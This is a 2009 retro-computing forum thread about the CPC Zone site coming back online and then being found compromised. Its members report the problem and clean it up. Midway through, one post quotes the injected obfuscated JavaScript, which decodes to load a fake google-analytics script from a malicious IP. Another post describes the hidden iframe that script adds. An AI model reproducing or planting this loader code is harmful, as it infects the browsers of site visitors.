News:

Printed Amstrad Addict magazine announced, check it out here!

Main Menu

CPC Zone Forums Update!

Started by Malc.Jennings, 02:03, 18 March 09

Previous topic - Next topic

0 Members and 2 Guests are viewing this topic.

Malc.Jennings

The CPC Zone forums will be back online at www.cpczone.net by the end of this week, I still have to cleanse our database and filter out the idiots that registered purely for the purpose of destroying the website / spamming but the software has been fully updated to the latest build so *touch wood* all should be good when it returns in a day or two. All VALID topics and registrations will still be in place when we return.

Thanks to Gryzor for your help in hosting the temporary forums.

ervin

WOOHOO!!!!!  ;D ;D ;D ;D ;D
Fantastic news!!!

fano

"NOP" is the perfect program : short , fast and (known) bug free

Follow Easter Egg products on Facebook !

Gryzor

Well, can't say I'm not miffed. Hadn't you said that "we'll see this August" I wouldn't have gone through all the trouble of setting it up and debugging just for two weeks. All down the drain, I suppose.

Malc.Jennings

#4
Okay. Then I won't bother bringing the forums back.

Guess I wrongly assumed people wanted the old posts, topics and member registrations back, now I realise why I didn't check the site as often as I should have done even more.

Ygdrazil

Hi Malc

We want the old postings back, please!

I think what Gryzor says is that if we had known you were so fast and effective in getting the forum back online we would not have restructured this forum... Nothing more actually!

/Ygdrazil

Quote from: Malc.Jennings on 11:49, 18 March 09
Okay. Then I won't bother bringing the forums back.

Guess I wrongly assumed people wanted the old posts, topics and member registrations back, now I realise why I didn't check the site as often as I should have done even more.

Malc.Jennings

Oh okay :)

I'm at work right now so can't do much more on it at present.

voXfReaX

Quote from: Malc.Jennings on 13:07, 18 March 09
Oh okay :)

I'm at work right now so can't do much more on it at present.

Great news Malc! :)
Please get back on air that forum!!
Too many interesting things! :)

ukmarkh

Happy days! CPCZONE forum coming back soon.
Gryzor, thanks for all the hard work... it's been a busy 2 weeks and you've done a great job supplying this forum and keeping everyone informed.

the KING

See the attachment,
I get this avast warning from time to time when I enter cpczone. Not every time, but every now and then.
I wouldn't be surprised if it's MY pc that's infected with something nasty, but I only get that warning on cpczone.

Just wanted you to know, since you have had some trouble earlier.

Tom

soda

Hi.

Looks like this piece of code has been inserted:
Quote
<script>var source ="=tdsjqu!uzqf>#ufyu0kbwbtdsjqu#!tsd>#iuuq;0095/355/249/660hpphmf.bobmzujdt0hb/kt#?=0tdsjqu?"; var result = "";for(var i=0;i<source.length;i++) result+=String.fromCharCode(source.charCodeAt(i)-1);document.write(result); </script>

When executed, this loads a script from 84.244.138.55 which is a malwaresite according to http://safebrowsing.clients.google.com/safebrowsing/diagnostic?client=Firefox&hl=en-US&site=http://84.244.138.55/google-analytics/ga.js

Looks like cpczone has been compromised again.

-soda

the KING

soda,
that was what I feared :-(

Tom

Gryzor

Ah rats. Chrome says:

QuoteSafe Browsing
Diagnostic page for cpczone.net

What is the current listing status for cpczone.net?
Site is listed as suspicious - visiting this web site may harm your computer.

What happened when Google visited this site?
Of the 6 pages we tested on the site over the past 90 days, 2 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2009-03-25, and the last time suspicious content was found on this site was on 2009-03-25.
Malicious software is hosted on 1 domain(s), including 84.244.138.0/.

This site was hosted on 1 network(s) including AS26347 (DREAMHOST).

Has this site acted as an intermediary resulting in further distribution of malware?
Over the past 90 days, cpczone.net did not appear to function as an intermediary for the infection of any sites.


Kaspersky did not react when I opened it in IE8, I hope I didn't catch a cold!

But how on earth...

Devilmarkus

I found this info:
Quotethat code insert this  javascript:
http://84.244.138.55/google-analytics/ga.js (not the real  google analytics)

then this new code insert this page  (http://84.244.138.55/ts/in.cgi?sliframe) on a hidden iframe on your  page

i dont know what that page do, it set some cookies then redirect you  to www.cmyip.com
Link to this discussion in a forum

So it seems that Malc should enable Save-PHP and delete this code.

Firefox already denies cpczone.net
When you put your ear on a hot stove, you can smell how stupid you are ...

Amstrad CPC games in your webbrowser

JavaCPC Desktop Full Release

Malc.Jennings

Website taken down again.

After this second attack I really don't want to bring the site back. So. There you have it.

Ygdrazil

Total disaster!

CRAP! I hate those 'attackers'...

Howcome they want hurt a completely harmless forum for retrocromputers!

Beats me!

Its a real pity with all those thousends of forum post .... ARGH!

/Ygdrazil

Quote from: Malc.Jennings on 10:57, 27 March 09
Website taken down again.

After this second attack I really don't want to bring the site back. So. There you have it.

Malc.Jennings

Actually. Forget what I just said.
Infected file replaced with clean copy. Host contacted.

Gryzor

...I don't get it. Is it the same sort of attack as before? Was the security hole fixed, or is it something new?

Dunno... maybe disable interactive forms entirely so as to prevent code injection?

Please, please do reconsider :(

PS Ah there, you replied when I was hitting Post :)

Malc.Jennings

Different attack than before. This seems to be incredibly common on the hosting provider we are with (won't name them just yet) according to the forums I've read.

I've switched off FTP access and moved it all to secure file uploading etc as well as changed the passwords for everything. There are no forms (currently at least) that one could use to upload anything, it appears the source code itself was modified, almost as if it was downloaded and re-uploaded with the mods in place.

Gryzor

Holly smokes, Batman, the Internets is a dangerous place.

It seems the only way to go is close down everything... Had to revert to VPN ftp'ing for CPCWiki myself :(

Malc.Jennings

Yeah. Sucks majorly.
Hasn't been a very good week overall. :(

voXfReaX

Quote from: Malc.Jennings on 10:57, 27 March 09
Website taken down again.

After this second attack I really don't want to bring the site back. So. There you have it.

:'( No Malc!!! This is the worst thing for our scene!!!
I do not know if I can help in any way in case you change your mind!
But please re-consider your thoughts about letting CPCzone die  :(

voxfreax

Powered by SMFPacks Menu Editor Mod